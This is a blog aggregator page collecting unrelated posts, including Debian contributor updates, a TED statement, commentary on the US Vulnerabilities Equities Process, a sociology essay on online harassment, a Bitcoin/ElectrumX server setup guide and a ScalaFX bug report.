Planet Russell

,

Planet DebianRuss Allbery: Free software log (October 2017)

I've not been taking the time to write these promptly in part because I've not found the time to do much free software work. Thankfully, November will at least contain some work-sponsored work (on a package that isn't widely used yet, but maybe we can make it appealing enough).

Anyway, that's for next month. For October, the only thing I have to report is refreshing the signing key for my personal Debian repository (generating a new key for the new release) and finally updating the distributions to move stretch to stable, jessie to oldstable, and create the new testing distribution (buster). If for some strange reason you're using my personal repositories (there probably isn't much reason just at the moment), be sure to upgrade eyrie-keyring, since I'm going to switch signing over to the new key shortly.

Planet DebianPetter Reinholdtsen: Legal to share more than 3000 movies listed on IMDB?

A month ago, I blogged about my work to automatically check the copyright status of IMDB entries, and try to count the number of movies listed in IMDB that is legal to distribute on the Internet. I have continued to look for good data sources, and identified a few more. The code used to extract information from various data sources is available in a git repository, currently available from github.

So far I have identified 3186 unique IMDB title IDs. To gain better understanding of the structure of the data set, I created a histogram of the year associated with each movie (typically release year). It is interesting to notice where the peaks and dips in the graph are located. I wonder why they are placed there. I suspect World War II caused the dip around 1940, but what caused the peak around 2010?

I've so far identified ten sources for IMDB title IDs for movies in the public domain or with a free license. This is the statistics reported when running 'make stats' in the git repository:

  249 entries (    6 unique) with and   288 without IMDB title ID in free-movies-archive-org-butter.json
 2301 entries (  540 unique) with and     0 without IMDB title ID in free-movies-archive-org-wikidata.json
  830 entries (   29 unique) with and     0 without IMDB title ID in free-movies-icheckmovies-archive-mochard.json
 2109 entries (  377 unique) with and     0 without IMDB title ID in free-movies-imdb-pd.json
  291 entries (  122 unique) with and     0 without IMDB title ID in free-movies-letterboxd-pd.json
  144 entries (  135 unique) with and     0 without IMDB title ID in free-movies-manual.json
  350 entries (    1 unique) with and   801 without IMDB title ID in free-movies-publicdomainmovies.json
    4 entries (    0 unique) with and   124 without IMDB title ID in free-movies-publicdomainreview.json
  698 entries (  119 unique) with and   118 without IMDB title ID in free-movies-publicdomaintorrents.json
    8 entries (    8 unique) with and   196 without IMDB title ID in free-movies-vodo.json
 3186 unique IMDB title IDs in total

The entries without IMDB title ID are candidates to increase the data set, but might equally well be duplicates of entries already listed with IMDB title ID in one of the other sources, or represent movies that lack a IMDB title ID. I've seen examples of all these situations when peeking at the entries without IMDB title ID. Based on these data sources, the lower bound for movies listed in IMDB that are legal to distribute on the Internet is between 3186 and 4713.

It would be great for improving the accuracy of this measurement, if the various sources added IMDB title ID to their metadata. I have tried to reach the people behind the various sources to ask if they are interested in doing this, without any replies so far. Perhaps you can help me get in touch with the people behind VODO, Public Domain Torrents, Public Domain Movies and Public Domain Review to try to convince them to add more metadata to their movie entries?

Another way you could help is by adding pages to Wikipedia about movies that are legal to distribute on the Internet. If such page exist and include a link to both IMDB and The Internet Archive, the script used to generate free-movies-archive-org-wikidata.json should pick up the mapping as soon as wikidata is updates.

As usual, if you use Bitcoin and want to show your support of my activities, please send Bitcoin donations to my address 15oWEoG9dUPovwmUL9KWAnYRtNJEkP1u1b.

TEDTED’s response to claims of sexual harassment

Photo: Marla Aufmuth / TED

We believe in ideas worth spreading. One of those ideas is that all humans are entitled to equal consideration and respect.

The Washington Post recently reported that TED has grappled with sexual harassment at its conferences and in the workplace. We would like to address that article here.

At the TED2017 conference in Vancouver, we were informed privately that four women attendees experienced sexual harassment, and another experienced aggressive behavior from male attendees.

We were alarmed by what we heard and immediately conducted full investigations to understand the context and impact of what had happened.

As a result, one man was asked to leave the conference immediately, and a second barred. These two men were the source of the five complaints, and will not return to TED.

The main TED conference attracts some 2,000 attendees, and in recent years we have been successful in increasing the percentage of women attending from about 25% to 40%. By and large, the vast majority of attendees report a wonderful experience.

But incidents do happen.

Historically, when we’ve heard that an attendee has experienced conduct that made them uncomfortable or worse, we have always investigated and done our best to resolve.

But this past year’s experience motivated us to do far more to strengthen our existing procedures. With input from experts, we put even more robust and specific anti-harassment policies and systems in place in summer 2017:

  • Making clear every attendee is aware of our code of conduct, and that violation of it would mean removal from the event.
  • Publicizing the means by which attendees can report problems.

We are determined to continue to increase the number of women who come to TED and to ensure that the conference experience is one where all attendees feel safe and respected.

The Washington Post article also mentioned two incidents alleged to have taken place at our New York-based office over the past four years. These were fully investigated at the time, and we took the claims very seriously. For the sake of the individuals mentioned, we don’t think it’s appropriate to address them in public.

We all have a strong belief in our mission and a deep respect for the perspectives and values our co-workers bring to the organization. 

We will use this story as motivation to ensure that inclusion remains at the core of our conference experience and workplace culture.


Planet DebianJoey Hess: stupid long route

There's an old net story from the 80's, which I can't find right now, but is about two computers, 10 feet apart, having a ridiculously long network route between them, packets traveling into other states or countries and back, when they could have flowed over a short cable.

Ever since I read that, I've been collecting my own ridiculously long routes. ssh bouncing from country to country, making letters I type travel all the way around the world until they echo back on my screen. Tasting the latency that's one of the only ways we can viscerally understand just how big a tangle of wires humanity has built.

Yesterday, I surpassed all that, and I did it in a way that hearkens right back to the original story. I had two computers, 20 feet apart, I wanted one to talk to the other, and the route between the two ended up traveling not around the Earth, but almost the distance to the Moon.

I was rebuilding my home's access point, and ran into a annoying bug that prevented it from listening to wifi. I knew it was still connected over ethernet to the satellite receiver.

I connected my laptop to the satellite receiver over wifi. But, I didn't know the IP address to reach the access point. Then I remembered I had set it up so incoming ssh to the satellite receiver was directed to the access point.

So, I sshed to a computer in New Jersey. And from there I sshed to my access point. And the latency was amazing. Because, every time I pressed a key:

  • It was sent to a satellite in geosynchrous orbit, 22250 miles high.
  • Which beamed it back to a ground station in Texas, another 22250 miles.
  • Which routed it over cable to New Jersey to my server there.
  • Which bounced it back to a Texas-size dish, which zapped it back to orbit, another 22250 miles.
  • And the satellite transmitted it back in the general direction of my house, another 22250 miles.
  • So my keystroke finally reached the access point. But then it had to show me it had received it. So that whole process happened again in reverse, adding another 89000 miles travel total.
  • And finally, after 178000 and change miles of data transfer, the letter I'd typed a full second ago appeared on my screen.

Not bad for a lazy solution to a problem that could have been solved by walking across the room, eh?

Previously: roundtrip latency from a cabin with dialup in 2011

TEDIt’s Nov. 18. Can we make jokes about Mugabe yet?

Comedian Carl Joshua Ncube writes: If you are about to watch my TED Talk, then you are watching the first one to have an expiry date. You see, when I went onto the red dot I was afraid, I was petrified — and this was not because of an ’80s tune or the fear of speaking in public on such a big stage. My fear was about my President Robert Mugabe. For 37 years of my life I have been filled with the fear of Mugabe, and coming to TED was my opportunity to show off my talent as a comedian, but fear got ahold of me through veiled threats from his agents about the content of my comedy.

So back to the EXPIRY of this talk… Today is the 18th of November and a historic moment for our country. Our army has seized power and as we speak we are all going out to the street to march for our FREEDOM. Today I march to end my FEAR. After you watch this, Mugabe may no longer be our PRESIDENT and I will no longer be afraid. Watch this TALK and see me when I used to be AFRAID to tell jokes! NOT ANYMORE! I am Carl Joshua Ncube and I fear nothing!


CryptogramNew White House Announcement on the Vulnerability Equities Process

The White House has released a new version of the Vulnerabilities Equities Process (VEP). This is the inter-agency process by which the US government decides whether to inform the software vendor of a vulnerability it finds, or keep it secret and use it to eavesdrop on or attack other systems. You can read the new policy or the fact sheet, but the best place to start is Cybersecurity Coordinator Rob Joyce's blog post.

In considering a way forward, there are some key tenets on which we can build a better process.

Improved transparency is critical. The American people should have confidence in the integrity of the process that underpins decision making about discovered vulnerabilities. Since I took my post as Cybersecurity Coordinator, improving the VEP and ensuring its transparency have been key priorities, and we have spent the last few months reviewing our existing policy in order to improve the process and make key details about the VEP available to the public. Through these efforts, we have validated much of the existing process and ensured a rigorous standard that considers many potential equities.

The interests of all stakeholders must be fairly represented. At a high level we consider four major groups of equities: defensive equities; intelligence / law enforcement / operational equities; commercial equities; and international partnership equities. Additionally, ordinary people want to know the systems they use are resilient, safe, and sound. These core considerations, which have been incorporated into the VEP Charter, help to standardize the process by which decision makers weigh the benefit to national security and the national interest when deciding whether to disclose or restrict knowledge of a vulnerability.

Accountability of the process and those who operate it is important to establish confidence in those served by it. Our public release of the unclassified portions Charter will shed light on aspects of the VEP that were previously shielded from public review, including who participates in the VEP's governing body, known as the Equities Review Board. We make it clear that departments and agencies with protective missions participate in VEP discussions, as well as other departments and agencies that have broader equities, like the Department of State and the Department of Commerce. We also clarify what categories of vulnerabilities are submitted to the process and ensure that any decision not to disclose a vulnerability will be reevaluated regularly. There are still important reasons to keep many of the specific vulnerabilities evaluated in the process classified, but we will release an annual report that provides metrics about the process to further inform the public about the VEP and its outcomes.

Our system of government depends on informed and vigorous dialogue to discover and make available the best ideas that our diverse society can generate. This publication of the VEP Charter will likely spark discussion and debate. This discourse is important. I also predict that articles will make breathless claims of "massive stockpiles" of exploits while describing the issue. That simply isn't true. The annual reports and transparency of this effort will reinforce that fact.

Mozilla is pleased with the new charter. I am less so; it looks to me like the same old policy with some new transparency measures -- which I'm not sure I trust. The devil is in the details, and we don't know the details -- and it has giant loopholes that pretty much anything can fall through:

The United States Government's decision to disclose or restrict vulnerability information could be subject to restrictions by partner agreements and sensitive operations. Vulnerabilities that fall within these categories will be cataloged by the originating Department/Agency internally and reported directly to the Chair of the ERB. The details of these categories are outlined in Annex C, which is classified. Quantities of excepted vulnerabilities from each department and agency will be provided in ERB meetings to all members.

This is me from last June:

There's a lot we don't know about the VEP. The Washington Post says that the NSA used EternalBlue "for more than five years," which implies that it was discovered after the 2010 process was put in place. It's not clear if all vulnerabilities are given such consideration, or if bugs are periodically reviewed to determine if they should be disclosed. That said, any VEP that allows something as dangerous as EternalBlue -- or the Cisco vulnerabilities that the Shadow Brokers leaked last August to remain unpatched for years isn't serving national security very well. As a former NSA employee said, the quality of intelligence that could be gathered was "unreal." But so was the potential damage. The NSA must avoid hoarding vulnerabilities.

I stand by that, and am not sure the new policy changes anything.

More commentary.

Here's more about the Windows vulnerabilities hoarded by the NSA and released by the Shadow Brokers.

EDITED TO ADD (11/18): More news.

Don MartiAsking sites to do something about surveillance marketing

This might get the privacy activists mad at me, but as far as I can tell it's still counterproductive to ask a web site you visit to remove its third-party trackers.

Of course, third-party trackers are probably helping to support a political cause that most sites don't agree with, and, as Zeynep Tufekci says, "We're building a dystopia just to make people click on ads". This stuff needs to get fixed. So this is about productive next steps.

Right now, advertising on the site you're writing to probably isn't saleable without the creepy trackers. (User tracking as Chesterton's Fence) So what can privacy people productively ask sites for? Some good ones are:

  • Fix any "turn off your ad blocker" scripts to detect ad blockers only, and not falsely alert on privacy tools.

  • Remove links to the the confusing and broken "YourAdChoices" site. Adtech opt-outs don't cover all trackers, and are much less effective than real privacy tools. (I have never had all the opt-outs work on that site, even from a fresh, pristine browser. Somehow I get the sense that the adtech firms don't exactly put their best people on it.)

  • Link to the privacy pages for the third parties the site uses. If the advertising on the site is set up so that this is hard to do, and users might see a tracker from an unknown domain, say so.

  • Fix up the privacy page to add links to appropriate privacy tools based on the user's browser. Better to have users on privacy tools than get enrolled in a paid whitelisting scheme.

  • If you maintain a privacy tool, offer to do a campaign with the site. Privacy tool users are high-quality human traffic. Free or discounted privacy tools might work as a subscription promotion. Where's the win-win?

Asking a site to walk away from money with no credible alternative is probably not going to work. Asking a site to consider next steps to get out of the current web advertising mess? That might.

More: What The Verge can do to help save web advertising

,

CryptogramFriday Squid Blogging: Peru and Chile Address Squid Overfishing

Peru and Chile have a new plan.

As usual, you can also use this squid post to talk about the security stories in the news that I haven't covered.

Read my blog posting guidelines here.

Rondam RamblingsA Bug in the KJV

I've been studying the Bible ever since I was 12 and my parents sent me to a YMCA summer camp in Tennessee.  They take the C in YMCA seriously there, and after two weeks of relentless proseletyzing I finally saw the The Light.  For three glorious days I was born again and felt the Presence of the Holy Spirit.  Then I went home and giddily told my parents the Good News. My father's reaction was

Planet DebianJonathan Carter: I am now a Debian Developer

It finally happened

On the 6th of April 2017, I finally took the plunge and applied for Debian Developer status. On 1 August, during DebConf in Montréal, my application was approved. If you’re paying attention to the dates you might notice that that was nearly 4 months ago already. I was trying to write a story about how it came to be, but it ended up long. Really long (current draft is around 20 times longer than this entire post). So I decided I’d rather do a proper bio page one day and just do a super short version for now so that someone might end up actually reading it.

How it started

In 1999… no wait, I can’t start there, as much as I want to, this is a short post, so… In 2003, I started doing some contract work for the Shuttleworth Foundation. I was interested in collaborating with them on tuXlabs, a project to get Linux computers into schools. For the few months before that, I was mostly using SuSE Linux. The open source team at the Shuttleworth Foundation all used Debian though, which seemed like a bizarre choice to me since everything in Debian was really old and its “boot-floppies” installer program kept crashing on my very vanilla computers. 

SLUG (Schools Linux Users Group) group photo. SLUG was founded to support the tuXlab schools that ran Linux.

My contract work then later turned into a full-time job there. This was a big deal for me, because I didn’t want to support Windows ever again, and I didn’t ever think that it would even be possible for me to get a job where I could work on free software full time. Since everyone in my team used Debian, I thought that I should probably give it another try. I did, and I hated it. One morning I went to talk to my manager, Thomas Black, and told him that I just don’t get it and I need some help. Thomas was a big mentor to me during this phase. He told me that I should try upgrading to testing, which I did, and somehow I ended up on unstable, and I loved it. Before that I used to subscribe to a website called “freshmeat” that listed new releases of upstream software and then, I would download and compile it myself so that I always had the newest versions of everything. Debian unstable made that whole process obsolete, and I became a huge fan of it. Early on I also hit a problem where two packages tried to install the same file, and I was delighted to find how easily I could find package state and maintainer scripts and fix them to get my system going again.

Thomas told me that anyone could become a Debian Developer and maintain packages in Debian and that I should check it out and joked that maybe I could eventually snap up “highvoltage@debian.org”. I just laughed because back then you might as well have told me that I could run for president of the United States, it really felt like something rather far-fetched and unobtainable at that point, but the seed was planted :)

Ubuntu and beyond

Ubuntu 4.10 default desktop – Image from distrowatch

One day, Thomas told me that Mark is planning to provide official support for Debian unstable. The details were sparse, but this was still exciting news. A few months later Thomas gave me a CD with just “warty” written on it and said that I should install it on a server so that we can try it out. It was great, it used the new debian-installer and installed fine everywhere I tried it, and the software was nice and fresh. Later Thomas told me that this system is going to be called “Ubuntu” and the desktop edition has naked people on it. I wasn’t sure what he meant and was kind of dumbfounded so I just laughed and said something like “Uh ok”. At least it made a lot more sense when I finally saw the desktop pre-release version and when it got the byline “Linux for Human Beings”. Fun fact, one of my first jobs at the foundation was to register the ubuntu.com domain name. Unfortunately I found it was already owned by a domain squatter and it was eventually handled by legal.

Closer to Ubuntu’s first release, Mark brought over a whole bunch of Debian developers that was working on Ubuntu over to the foundation and they were around for a few days getting some sun. Thomas kept saying “Go talk to them! Go talk to them!”, but I felt so intimidated by them that I couldn’t even bring myself to walk up and say hello.

In the interest of keeping this short, I’m leaving out a lot of history but later on, I read through the Debian packaging policy and really started getting into packaging and also discovered Daniel Holbach’s packaging tutorials on YouTube. These helped me tremendously. Some day (hopefully soon), I’d like to do a similar video series that might help a new generation of packagers.

I’ve also been following DebConf online since DebConf 7, which was incredibly educational for me. Little did I know that just 5 years later I would even attend one, and another 5 years after that I’d end up being on the DebConf Committee and have also already been on a local team for one.

DebConf16 Organisers, Photo by Jurie Senekal.

It’s been a long journey for me and I would like to help anyone who is also interested in becoming a Debian maintainer or developer. If you ever need help with your package, upload it to https://mentors.debian.net and if I have some spare time I’ll certainly help you out and sponsor an upload. Thanks to everyone who have helped me along the way, I really appreciate it!

Planet DebianRaphaël Hertzog: Freexian’s report about Debian Long Term Support, October 2017

A Debian LTS logoLike each month, here comes a report about the work of paid contributors to Debian LTS.

Individual reports

In October, about 197 work hours have been dispatched among 13 paid contributors. Their reports are available:

  • Antoine Beaupré did 21h (out of 16h allocated + 8.75h remaining, thus keeping 3.75h for November).
  • Ben Hutchings did 20 hours (out of 15h allocated + 9 extra hours, thus keeping 4 extra hours for November).
  • Brian May did 10 hours.
  • Chris Lamb did 18 hours.
  • Emilio Pozuelo Monfort did 7 hours (out of 20.75 hours allocated + 1.5 hours remaining, thus keeping 15.25 hours for November).
  • Guido Günther did 6.5 hours (out of 11h allocated + 1 extra hour, thus keeping 5.5h for November).
  • Hugo Lefeuvre did 20h.
  • Lucas Kanashiro did 2 hours (out of 5h allocated, thus keeping 3 hours for November).
  • Markus Koschany did 19 hours (out of 20.75h allocated, thus keeping 1.75 extra hours for November).
  • Ola Lundqvist did 7.5h (out of 7h allocated + 0.5 extra hours).
  • Raphaël Hertzog did 13.5 hours (out of 12h allocated + 1.5 extra hours).
  • Roberto C. Sanchez did 11 hours (out of 20.75 hours allocated + 14.75 hours remaining, thus keeping 24.50 extra hours for November, he will give back remaining hours at the end of the month).
  • Thorsten Alteholz did 20.75 hours.

Evolution of the situation

The number of sponsored hours increased slightly to 183 hours per month. With the increasing number of security issues to deal with, and with the number of open issues not really going down, I decided to bump the funding target to what amounts to 1.5 full-time position.

The security tracker currently lists 50 packages with a known CVE and the dla-needed.txt file 36 (we’re a bit behind in CVE triaging apparently).

Thanks to our sponsors

New sponsors are in bold.

No comment | Liked this article? Click here. | My blog is Flattr-enabled.

Sociological ImagesSilencing Sexual Harassment Complaints in Pakistan and the US

All hell broke loose online in Pakistan this winter after their first Oscar winner, Sharmeen Obaid, tweeted a complaint against a doctor who sent an unsolicited friendship request on Facebook to her sister following an E.R. visit. Sharmeen’s tweet provoked a firestorm of debate amongst Pakistani social media users, who shared a picture of Sharmeen posing with American film producer Harvey Weinstein “as proof” of Sharmeen’s double standards on sexual harassment.

Sharmeen Obaid, World Economic Forum (via Wikimedia Commons)

Sharmeen is not the first Pakistani to incite calls to violence by going public about abuse. Member of Parliament Ayesha Gulalai received severe and terrifying censure from social media trolls for her public accusations of sexual harassment against former-cricketer-turned-politician Imran Khan. Similar critiques have also been used against Malala Yusufzai, Pakistan’s only woman Nobel laureate, when social media users suggested that photographs of her at Oxford University wearing a bomber jacket and jeans, under a modest headscarf, looked just like porn actress Mia Khalifa.

These issues are not limited to Pakistan alone, of course. Digital harassment has been a prominent issue in the United States as well, and the tactics trolls use to challenge women who speak out about harassment are strikingly similar in both countries. Trolls in both contexts deploy words like “feminazi,” or “man-hater,” accusing women of “exaggerating,” “attention-seeking,” or of “trivializing” “real” cases of abuse to further their own taste for drama. They create fake Facebook or Twitter accounts in the name of a woman (or other abused person) going public, using these accounts to post humiliating status updates or embarrassing personal details about the survivor. Women in both cases are quickly accused of being traitors, airing their dirty laundry on a global stage with implications for the reputation of their social groups or organizations.

Comparing American and Pakistani harassment cases highlights how geographically distant and culturally different locations draw on similar vocabularies of silencing, giving rise to global patterns of sex-based subjection. They also show how assumptions about gender and power work to screen men perpetrating abuse against women and others.

Malala Yousafzai (via Claude Truong-Ngoc/Wikimedia Commons)

In the Pakistani setting, social media backlash against women who speak out about abuse taps into longer-running anxieties around women, publicity and the West. Seeing women who go public about abuse as excessively westernized, these anxieties suggest such women are exaggerating local problems before foreign audiences in order to win accolades from an unspecified “west” willing to pay “traitorous” women in visas, prizes, and scholarships for help in defaming Pakistan and Islam. While a cultural logic of purdah, (literally “screen,” a logic of gendered segregation) technically separates men who abuse women; these same logics don’t protect women against men’s invasion of their privacy once women have entered public domains. Wearing jeans, studying at Oxford, going to a hospital, or having a Facebook account or a cell phone all become avenues for men to take non-intimate, public interactions into the private zone, seeking an unsolicited and unwelcome intimacy, or hiding behind the cloak of online anonymity to create humiliating memes about these women.

While gender arrangements in the US don’t operate according to purdah norms, the Harvey Weinstein case, including the doubt and shaming of women who participated in the #metoo campaign afterwards, highlights the repertoires men can use to screen their abuse of vulnerable colleagues. Bullying, browbeating, pay offs, and threats of job loss or legal action act as a kind of purdah to silence women. Similarly, American women complain about receiving unsolicited “dick pics” over various digital formats from men they barely know. Indeed, the prevalence of digital forms of harassment across both geographical settings renders online anger against people who come out about abuse inexplicable.

If there is any virtue at all to the recent firestorm, it is that Pakistanis and Americans have begun to ask: what constitutes abuse? How should people respond? Are micro-harassments, such as pictures and friendship requests still inconsequential if they are widespread and relentless? These cases invite us to dwell more deeply on connections between geographically distant cases of sex-based oppression. Mobile feminists, moving back and forth between different contexts, can reflect more deeply on the ways that various binaries, West/Islam, Public/Private, and offline/online complicate discussions about sexual identity, abuse and power in both locations. Highlighting how different geographic locations and cultural contexts share these problems in common can developing a common vocabulary for talking about sex-based subjection.

Fauzia Husain is an AAUW International Doctoral Fellow and a PhD candidate at the University of Virginia, Department of Sociology. Her current research examines how Pakistani women security workers experience their work, contend with the stigma of breaching purdah (gender segregation), and enact agency at the interstices of state, gender, work and globalization.

(View original at https://thesocietypages.org/socimages)

Worse Than FailureError'd: Never ASSume that You're Free from Errors

"This was in an email from Nest. I'm sure in some other font this shows a heartwarming image of fluffy bunnies frolicking in an energy saving Utopia, but instead, we get this," wrote Matthew W.

 

"Um...yeah, sure I guess?" writes Chris U.

 

Stuart L. wrote, "Looks like the weather has made an 8-bit turn for the worse."

 

"I had no idea that the success of entering my enrollment depended on whether or not my donkey was nearby," writes Ernie D.

 

Jamie S. writes, "What exactly are you trying to smuggle in, Fujitsu updater?"

 

"I'm the fastest man alive. Don't believe me? Check this out," writes John W.

 

[Advertisement] Atalasoft’s imaging SDKs come with APIs & pre-built controls for web viewing, browser scanning, annotating, & OCR/barcode capture. Try it for 30 days with included support.

Planet DebianCraig Small: Short Delay with WordPress 4.9

You may have heard WordPress 4.9 is out. While this seems a good improvement over 4.8, it has a new editor that uses codemirror.  So what’s the problem? Well, inside codemirror is jshint and this has that idiotic no evil license. I think this was added in by WordPress, not codemirror itself.

So basically WordPress 4.9 has a file, or actually a tiny part of a file that is non-free.  I’ll now have to delay the update of WordPress to hack that piece out, which probably means removing the javascript linter. Not ideal but that’s the way things go.

 

Planet DebianMichal Čihař: Running Bitcoin node and ElectrumX server

I've been tempted to run own ElectrumX server for quite some. First attempt was to run this on Turris Omnia router, however that turned out to be impossible due to memory requirements both Bitcoind and ElectrumX have.

This time I've dedicated host for this and it runs fine:

Electrum connecting to btc.cihar.com

The server runs Debian sid (probably it would be doable on stretch as well, but I didn't try much) and the setup was pretty simple.

First we need to install some things - Bitcoin daemon and ElectrumX dependencies:

# Bitcoin daemon, not available in stretch
apt install bitcoind

# We will checkout ElectrumX from git
apt install git

# ElectrumX deps
apt install python3-aiohttp

# Build environment for ElectrumX deps
apt install build-essentials python3-pip libleveldb-dev

# ElectrumX deps not packaged in Debian
pip3 install plyvel pylru

# Download ElectrumX sources
su - electrumx -c 'git clone https://github.com/kyuupichan/electrumx.git'

Create users which will run the services:

adduser bitcoind
adduser electrumx

Now it's time to prepare configuration for the services. For Bitcoin it's quite simple - we need to configure RPC interface and enable transaction index in /home/bitcoind/.bitcoin/bitcoin.conf:

txindex=1
listen=1
rpcuser=bitcoin
rpcpassword=somerandompassword

The ElectrumX configuration is quite simple as well and it's pretty well documented. I've decided to place it in /etc/electrumx.conf:

COIN=BitcoinSegwit
DB_DIRECTORY=/home/electrumx/.electrumx
DAEMON_URL=http://bitcoin:somerandompassword@localhost:8332/
TCP_PORT=50001
SSL_PORT=50002
HOST=::

DONATION_ADDRESS=3KPccmPtejpMczeog7dcFdqX4oTebYZ3tF

SSL_CERTFILE=/etc/letsencrypt/live/btc.cihar.com/fullchain.pem
SSL_KEYFILE=/etc/letsencrypt/live/btc.cihar.com/privkey.pem

REPORT_HOST=btc.cihar.com
BANNER_FILE=banner

I've decided to control both services using systemd, so it's matter of creating pretty simple units for that. Actually the Bitcoin one closely matches the one I've used on Turris Omnia and the ElectrumX the one they ship, but there are some minor changes.

Systemd unit for ElectrumX in /etc/systemd/system/electrumx.service:

[Unit]
Description=Electrumx
After=bitcoind.target

[Service]
EnvironmentFile=/etc/electrumx.conf
ExecStart=/home/electrumx/electrumx/electrumx_server.py
User=electrumx
LimitNOFILE=8192
TimeoutStopSec=30min

[Install]
WantedBy=multi-user.target

And finally systemd unit for Bitcoin daemon in /etc/systemd/system/bitcoind.service:

[Unit]
Description=Bitcoind
After=network.target

[Service]
ExecStart=/usr/bin/bitcoind
User=bitcoind
TimeoutStopSec=30min
Restart=on-failure
RestartSec=30

[Install]
WantedBy=multi-user.target

Now everything should be configured and it's time to start up the services:

# Enable services so that they start on boot 
systemctl enable electrumx.service bitcoind.service

# Start services
systemctl start electrumx.service bitcoind.service

Now you have few days time until Bitcoin fetches whole blockchain and ElectrumX indexes that. If you happen to have another Bitcoin node running (or was running in past), you can speedup the process by copying blocks from that system (located in ~/.bitcoin/blocks/). Only get blocks from sources you trust absolutely as it might change your view of history, see Bitcoin wiki for more information on the topic. There is also magnet link in the ElectrumX docs to download ElectrumX database to speed up this process. This should be safe to download from untrusted source.

The last think I'd like to mention is resources usage. You should have at least 4 GB of memory to run this, 8 GB is really preferred (both services consume around 4GB). On disk space, Bitcoin currently consumes 170 GB and ElectrumX 25 GB. Ideally all this should be running on the SSD disk.

You can however offload some of the files to slower storage as old blocks are rarely accessed and this can save some space on your storage. Following script will move around 50 GB of blockchain data to /mnt/btc/blocks (use only when Bitcoin daemon is not running):

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
#!/bin/sh
set -e

DEST=/mnt/btc/blocks

cd ~/.bitcoin/blocks/

find . -type f \( -name 'blk00[0123]*.dat' -o -name 'rev00[0123]*dat' \) | sed 's@^\./@@' | while read name ; do
        mv $name $DEST/$name
        ln -s $DEST/$name $name
done

Anyway if you would like to use this server, configure btc.cihar.com in your Electrum client.

If you find this howto useful, you can send some Satoshis to 3KPccmPtejpMczeog7dcFdqX4oTebYZ3tF.

Filed under: Crypto Debian English

Planet DebianNorbert Preining: ScalaFX: Problems with Tables abound

Doing a lot with all kinds of tables in ScalaFX, I stumbled upon a bug in ScalaFX that, with the help of the bug report, I was able to circumvent. It is a subtle bug where types are mixed between scalafx.SOMETHING and the corresponding javafx.SOMETHING.

In one of the answers it is stated that:

The issue is with implicit conversion from TableColumn not being located by Scala. I am not clear why this is happening (maybe a Scala bug).

But the provided work-around at least made it work. Until today I stumbled onto a (probably) just another instance of this bug, but where the same work-around does not help. I am using TreeTableViews and try to replace the children of the root by filtering out one element. The code I use is of course very different, but here is a reduced and fully contained example, based on the original bug report and adapted to use a TreeTableView:

import scalafx.Includes._
import scalafx.scene.control.TreeTableColumn._
import scalafx.scene.control.TreeItem._
import scalafx.application.JFXApp.PrimaryStage
import scalafx.application.JFXApp
import scalafx.scene.Scene
import scalafx.scene.layout._
import scalafx.scene.control._
import scalafx.scene.control.TreeTableView
import scalafx.scene.control.Button
import scalafx.scene.paint.Color
import scalafx.beans.property.{ObjectProperty, StringProperty}
import scalafx.collections.ObservableBuffer


// TableTester.scala
object TableTester extends JFXApp {

  val characters = ObservableBuffer[Person](
    new Person("Peggy", "Sue", "123", Color.Violet),
    new Person("Rocky", "Raccoon", "456", Color.GreenYellow),
    new Person("Bungalow ", "Bill", "789", Color.DarkSalmon)
  )

  val table = new TreeTableView[Person](
    new TreeItem[Person](new Person("","","",Color.Red)) {
      expanded = true
      children = characters.map(new TreeItem[Person](_))
    }) {
    columns ++= List(
      new TreeTableColumn[Person, String] {
        text = "First Name"
        cellValueFactory = {
          _.value.value.value.firstName
        }
        prefWidth = 180
      },
      new TreeTableColumn[Person, String]() {
        text = "Last Name"
        cellValueFactory = {
          _.value.value.value.lastName
        }
        prefWidth = 180
      }
    )
  }

  stage = new PrimaryStage {
    title = "Simple Table View"
    scene = new Scene {
      content = new VBox() {
        children = List(
          new Button("Test it") {
            onAction = p => {
              val foo: ObservableBuffer[TreeItem[Person]] = table.root.value.children.map(p => {
                val bar: TreeItem[Person] = p
                p
              })
              table.root.value.children = foo
            }
          },
          table)
      }
    }
  }
}

// Person.scala
class Person(firstName_ : String, lastName_ : String, phone_ : String, favoriteColor_ : Color = Color.Blue) {

  val firstName = new StringProperty(this, "firstName", firstName_)
  val lastName = new StringProperty(this, "lastName", lastName_)
  val phone = new StringProperty(this, "phone", phone_)
  val favoriteColor = new ObjectProperty(this, "favoriteColor", favoriteColor_)

  firstName.onChange((x, _, _) => System.out.println(x.value))
}

With this code what one gets on compilation with the latest Scala and ScalaFX is:

[error]  found   : scalafx.collections.ObservableBuffer[javafx.scene.control.TreeItem[Person]]
[error]  required: scalafx.collections.ObservableBuffer[scalafx.scene.control.TreeItem[Person]]
[error]               val foo: ObservableBuffer[TreeItem[Person]] = table.root.value.children.map(p => {
[error]                                                                                          ^
[error] one error found

And in this case, adding import statements didn’t help, what a pity. Unfortunately this bug is open since 2014 with a helpwanted tag and nothing is going on. I guess I have to try to dive into the source code of ScalaFX 🙁

Planet DebianRenata Scheibler: Hello, world!

,

Planet DebianMichal Čihař: New projects on Hosted Weblate

Hosted Weblate provides also free hosting for free software projects. The hosting requests queue has grown too long, so it's time to process it and include new project.

This time, the newly hosted projects include:

If you want to support this effort, please donate to Weblate, especially recurring donations are welcome to make this service alive. You can do that easily on Liberapay or Bountysource.

Filed under: Debian English SUSE Weblate

TED“The courage to …” The talks of TED@Tommy

At TED@Tommy — held November 14, 2017, at Mediahaven in Amsterdam — fifteen creators, leaders and innovators invited us to dream, to dare and to do. (Photo: Richard Hadley / TED)

Courage comes in many forms. In the face of fear, it’s the conviction to dream, dare, innovate, create and transform. It’s the ability to try and try again, to admit when we’re wrong and stand up for what’s right.

TED and Tommy Hilfiger both believe in the power of courageous ideas to break conventions and celebrate individuality — it’s the driving force behind why the two organizations have partnered to bring experts in fashion, sustainability, design and more to the stage to share their ideas.

More than 300 Tommy associates from around the world submitted their ideas to take part in TED@Tommy, with more than 20 internal events taking place at local and regional levels, and the top 15 ideas were selected for the red circle on the TED@Tommy stage. At this inaugural event — held on November 14, 2017, at Mediahaven in Amsterdam — creators, leaders and innovators invited us to dream, to dare and to do.

After opening remarks from Daniel Grieder, CEO, Tommy Hilfiger Global and PVH Europe, and Avery Baker, Chief Brand Officer, Tommy Hilfiger Global, the talks of Session 1 kicked off.

Fashion is “about self-expression, a physical embodiment of what we portray ourselves as,” says Mahir Can Isik, speaking at TED@Tommy in Amsterdam. (Photo: Richard Hadley / TED)

